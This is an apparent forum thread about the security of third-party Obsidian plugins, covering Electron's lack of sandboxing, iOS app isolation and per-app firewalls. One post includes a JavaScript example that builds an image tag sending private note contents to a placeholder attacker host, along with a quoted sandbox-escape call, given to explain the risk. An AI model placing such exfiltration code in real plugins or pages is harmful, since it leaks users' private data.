Security of the plugins

i don’t know anything about coding, but that sounds understandable

May I ask what the costs are of integrating some 3rd-party plug-ins into the existing native plug-in collection? I assume the native ones are security-guaranteed.

many thanks

oh that’s nice

There’s something that the earlier discussions were missing, and the devs tried to explain but it didn’t seem to come across very clearly to some folks.

So I’ll try to break it down a bit and hopefully it will help others understand the issues here.

For reference, I work in cybersecurity, and although I don’t know the specifics of the inner workings of Electron and Node I do know enough to understand the nature of how these types of apps work and the ramifications of those architectures.

  • Obsidian runs on Electron, a framework that combines Node.js and Chromium into a desktop runtime
  • Normally, JavaScript runs inside a browser, which has a strict security model, often called a “sandbox”, that prevents the JS from touching anything the browser does not expose
    • browser-executed JavaScript cannot even see the file system, so it cannot execute arbitrary commands against your files – this is inherent in the browser security model by design
    • this seems to be the viewpoint some have adopted, and it reflects a misunderstanding of how Electron differs from normal browser-based apps
  • When “normal” apps run they are run with the security permissions of the user who runs them
    • behind the scenes each process must run under a user ID, and for apps you open/execute they automatically run under your user ID – with your security permissions attached
    • this is why running an app can mean the app has access to any file/folder that you have access to, because the app is effectively running “as you” while it executes
    • mobile apps (in particular iOS) have altered how people understand security at the app & OS level, because iOS is specifically designed to create this “sandbox” effect by restricting what data an app can see centrally
    • non-mobile OSes (e.g. Windows, Mac, Linux) are not designed that way and instead run each process in the process space and memory space of the user who runs them with that user’s security permissions
  • Node.js is a JavaScript runtime designed for direct execution at the OS level on Windows, Mac, and Linux, and as such it does not run inside a browser or any other app “sandbox”
    • it runs in the process space and memory space of the user who runs it and thus has access to everything that user has access to
    • this means any Node.js app has full access to all of your files and data: anything you can open in your file browser or editor of choice and read/edit/delete, any Node.js app you open can read/edit/delete too, because behind the scenes it is running “as you” with your permissions
  • Since Electron runs on Node.js it also runs as that user in the process/memory space of the user who runs it, and thus has full access to everything that user has access to
    • “Plugins” in an Electron ecosystem are simply javascript files that are loaded into the running Electron process, which again already has full access to everything the user running it has access to (and again, this was by design when OSes were designed decades ago)
  • Since Obsidian runs on Electron then Obsidian plugins are also just javascript loaded into the same process space and memory space as the main Electron components, which again behind the scenes are running on Node.js which is itself running within the process/memory space of the user who runs it

Therefore, it isn’t feasible to restrict the plugins in the manner requested since any arbitrary javascript code by design can be injected into a running Electron process.

This is articulated by the Electron developers themselves. From a link originally posted by @rapatel0:

As web developers, we usually enjoy the strong security net of the browser - the risks associated with the code we write are relatively small. Our websites are granted limited powers in a sandbox, and we trust that our users enjoy a browser built by a large team of engineers that is able to quickly respond to newly discovered security threats.

When working with Electron, it is important to understand that Electron is not a web browser. It allows you to build feature-rich desktop applications with familiar web technologies, but your code wields much greater power. JavaScript can access the filesystem, user shell, and more. This allows you to build high quality native applications, but the inherent security risks scale with the additional powers granted to your code.

With that in mind, be aware that displaying arbitrary content from untrusted sources poses a severe security risk that Electron is not intended to handle. In fact, the most popular Electron apps (Atom, Slack, Visual Studio Code, etc) display primarily local content (or trusted, secure remote content without Node integration) – if your application executes code from an online source, it is your responsibility to ensure that the code is not malicious.

Source: Security, Native Capabilities, and Your Responsibility | Electron

Additionally, creating a “privacy rating” risks two things:

  • security theater, where people trust what they perceive to be a quantified rating that is in fact based on a subjective qualitative analysis (this is a massive problem across all of security, btw)
  • legal/financial liability for the devs, where a plugin is proven to not have sufficient protections to warrant the rating it was given

Finally, to one of @den’s points:

anyway the API should have security in mind…for example read only access

As above, since javascript plugins are loaded into the running user context of the underlying Node.js process they can trivially bypass any restrictions the Obsidian devs tried to place into the API.

If the devs add security restrictions to the API the javascript can simply bypass that by executing a shell command to run against the underlying folders and markdown files in the vault. Remember, the plugin runs under the Node.js process which runs “as you” and has all the same permissions you do to read/write all the files in your vault (and anywhere else on your computer that you have access to as well).

There’s nothing Obsidian can do to prevent that, since that capability exists by design as an inherent feature of Node.js itself.

Given all of the above, the only immediately feasible mechanism for handling this situation appears to be the social trust mechanism already built into the plugin system: users can easily access the GitHub project for each plugin and inspect its source code, can rate the plugin up/down, and if necessary can contact the devs directly here to report an egregious security flaw and have it placed on the central denylist.


New user to Obsidian here.

I believe the solution to proper sandboxing of the plugins is vm2 (see vm2 - npm). This allows sandboxed code to run within a Node.js context with no known escape routes except those poked into it via an API.

It may well be that the intended API and control system have a huge vulnerable surface area due to needed features. I haven’t done the deep dive there.

But good sandboxing tools do exist on Node.js…


I work on systems that deal with PHI (protected health information).

FileVault is security for “data at rest”, which is to say, data on your computer when it is powered off. If someone were to physically walk away with it and try to extract data from the hard drive, FileVault would be a barrier to that.

Data at rest is the #1 method of data compromise, by far.

Your notes will be vulnerable to malware, but malware is generally not going to sniff through your personal notes for PHI. It’s after more directly valuable commodities: financial credentials, AWS keys, and the like.

Sandboxing code is certainly doable technically, but it would either cripple the entire plugin API, or it would be trivial to bypass the sandbox. Proper sandboxing basically means removing almost everything from the API (access to the DOM elements, most node.js and electron APIs), which means pretty much 90%+ of current plugins would just plain be impossible.

If plugins had access to Electron’s API, it would be trivial to escape the sandbox by creating a new BrowserWindow and then calling win.webContents.executeJavaScript('untrusted code');.

If plugins had access to Node.js’s API, they could escape the sandbox using a variety of mechanisms like child_process.

If we were to allow DOM access, it would be trivial to escape the sandbox too. There are many ways DOM access can lead to a sandbox escape – a simple version would be creating a <script> tag, and a more sophisticated attack might use iframes or non-HTML namespaces (like svg). Regardless, even with a simple <img src=""> you now have a data-exfiltration mechanism.
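To illustrate that last point, even a single image tag is an exfiltration channel; no script execution is needed once it lands in the DOM (the attacker domain below is made up):

```javascript
// A plain <img> tag exfiltrates data: the rendering engine fetches the
// src URL, smuggling the data out in the query string.
// ("attacker.example" is a placeholder domain, of course.)
function exfilTag(stolenData) {
  const payload = encodeURIComponent(stolenData);
  return `<img src="https://attacker.example/collect?d=${payload}">`;
}

const tag = exfilTag('contents of a private note');
console.log(tag);
// Injecting this string into the page triggers an outbound request
// carrying the stolen data as soon as the element is rendered.
```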


It’s funny, this conversation gives me flashbacks to 2014, when I really started using the Atom editor. I had this same concern, and there was a long thread about this exact topic:

It’s telling that the original team behind making electron and atom don’t have a good story around this problem. Every electron app that you use that has user created plugins will have the same gaping vulnerabilities.

Is it possible to security lock down plugins? Well… maybe. Figma did some interesting things to lock down their plugin system (but it’s a bit different b/c those also have to run in their web app). They have a large engineering team with a lot of resources and a different set of constraints though. Also, as @Licat said, the ecosystem that exists now couldn’t continue to exist.

At the end of the day, just be very judicious with what you install. Downloading a plugin is no different and no safer than installing a package from NPM. Both are running arbitrary unseen code from a stranger on the internet.


@zephraph… Can you explain briefly (if that’s possible) whether what you’ve written about plugin ‘security issues’ applies equally to someone only using plugins with the Obsidian iPadOS app with Obsidian Sync, and NOT Obsidian on a Mac? By that I mean, it is my limited understanding that the iPad app is sandboxed within the iPadOS ecosystem, so plugins I use with Obsidian Mobile can NOT gain access to anything outside the app, unlike on macOS where the Obsidian app uses Electron, etc., etc.!


I’m not an expert on iOS security, but as I understand it, having 3rd-party plugin code running within Obsidian wouldn’t impact the security of a device any more than installing a random app from the App Store. There are some technical caveats to that statement. One might suggest that the App Store review process is in part designed to catch malicious activity, but given that there are high-profile scam apps that are left up, I highly doubt the process is thorough enough to vet all that deeply.

It’s certainly different than the app running on a desktop, though. iOS has built-in security sandboxing on a per-app basis. Apps can’t arbitrarily access information on the device without explicitly granted permissions. If, however, you grant Obsidian access to, say, view and edit your photos, then it’s technically possible that a plugin running inside Obsidian could also access your photos. As long as the Obsidian app limits its overall permission requests, it should be relatively safe.

The risk is smaller, but it’s not without risk.

Thanks. In this instance IMHO, Smaller IS better!

I’m not an expert, but it seems to me that we could approach this question from a different angle:

What would be some ways to run Obsidian with third-party plugins in a relatively secure manner (when handling sensitive data, for example)? The most obvious approach for the desktop, it seems to me, would be to use a firewall to disable Obsidian’s internet access whenever one is using third-party plugins. (For a firewall on Windows, I use NetLimiter.) If one is using Obsidian Sync, one could periodically turn ‘safe mode’ back on and enable Obsidian’s internet access to allow syncing. To install or update plugins, one would need to turn off each third-party plugin and then enable Obsidian’s internet access.
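For what it’s worth, on Windows this can also be done without extra software using the built-in firewall; the rule below is a sketch, and the program path is illustrative (adjust it to your actual install location):

```shell
# Block Obsidian's outbound traffic with the built-in Windows firewall
# (run from an elevated prompt; the path below is illustrative).
netsh advfirewall firewall add rule name="Block Obsidian" dir=out action=block enable=yes program="C:\Users\<you>\AppData\Local\Obsidian\Obsidian.exe"

# Delete the rule again when you want to sync or update plugins:
netsh advfirewall firewall delete rule name="Block Obsidian"
```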

This approach wouldn’t stop malicious code that somehow installs itself outside of Obsidian (if such a thing is possible), but it should prevent third-party plugins from directly accessing the internet.

(On mobile, one could turn off WiFi and Bluetooth, and disable Obsidian’s permission to use cellular data, while one has third-party plugins enabled.)

Does the above make sense? It’s a bit cumbersome, but it seems to me that it could be worthwhile in some cases.


@lucasd : good suggestion. On my Mac laptop I use Lulu (it is free) which alerts me whenever an app tries to go online without my authorization.


Basically, on desktop you can use per-app or iptables firewalls, and on mobile you can use mobile firewalls or just switch off internet access for Obsidian.

Some suggestions:

  • Windows: TinyFirewall
  • Mac: Lulu
  • Linux: OpenSnitch (+ GUI)
  • Android: NetGuard (supports IP tables as well)
  • iOS: [no idea]

I’ve been a Mac user for 25 years. In that time the OS grew from a few MB to many GB, and meantime I have had huge problems keeping my system clean. Even as a heavy user, I still have very little to no knowledge of development and programming. I completely reinstall my system every one to two years to get rid of all the junk that accumulates in the system, especially in the Library folder.

I installed Lulu once. Without even the faintest idea what most of the processes and internet connections shown to me in this program were necessary for, I uninstalled it.

What I want to say is that users and programmers view this subject from two absolutely different worlds. I am absolutely unable to verify the security of Obsidian plugins. If the Obsidian developers want users to install plugins, there must be another way (from my point of view).


@PietArt: I doubt the Obsidian devs particularly want people to install plug-ins; why should they? Their focus is purely Obsidian, and in order to stay focused like that they (husband + wife) have stated clearly that they do not have the time to check and keep tabs on plug-ins.

If you look at the plug-in list there are huge numbers of downloads so they are already popular with many.

At the end of the day you will have to take a gamble: do I trust this plug-in dev or not.

Maybe, for one, so they don’t have to deal with every feature request that is submitted in this forum. Kinda allows for a narrowing of focus, so to speak.

Besides, in an earlier post in this thread @Licat said:

“Sandboxing code is certainly doable technically, but it would either cripple the entire plugin API, or it would be trivial to bypass the sandbox. Proper sandboxing basically means removing almost everything from the API (access to the DOM elements, most node.js and electron APIs), which means pretty much 90%+ of current plugins would just plain be impossible.”

They don’t have to deal with every FR, the mods do that.

So… the Mods determine what’s ‘worthy’?

No, I’m not sure what Klaas is referring to. You are certainly right that the plugin API has allowed the community to build out tons of features that would have been impossible for the developers to handle by themselves.

@Daveb08: if I am not mistaken, the FRs go through an initial filtering by the mods, notably WhiteNoise. FRs may be unachievable/unrealistic, may have already been submitted, or may already be being worked on, ……

That in and of itself relieves the devs of a lot of work, although they ultimately decide what is “worthy”, as you call it.